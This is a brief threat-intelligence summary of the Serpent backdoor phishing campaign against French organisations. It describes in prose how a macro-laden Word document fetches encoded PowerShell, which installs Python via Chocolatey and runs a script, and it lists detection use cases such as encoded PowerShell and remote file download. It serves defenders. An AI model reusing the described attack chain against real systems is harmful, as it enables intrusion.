Serpent Backdoor Malware
Serpent Backdoor Malware
Industry: N/A | Level: Tactical | Source: ProofPoint
Research from ProofPoint, identifies a phishing campaign aimed at French entities in industries for construction, government and real estate. The campaign utilizes a Microsoft Word document with an embedded macro, the serpent identifier is derived from the VBA macro as it contains ASCII art illustrating snakes in various sections. Following user execution, a connection is made to a URL containing a PowerShell script that is base64 encoded. Chocolatey, an open-source package installer, is downloaded and installed by the PowerShell script to install Python. The script completes with a python script executed from a .bat file.
- Anvilogic Scenario: Serpent Backdoor Malware - Attack Chain
- Anvilogic Use Cases:
- Office Binary Download Remote File
- Encoded PowerShell Command
- Invoke-WebRequest Command
- Python Execution
- Package installation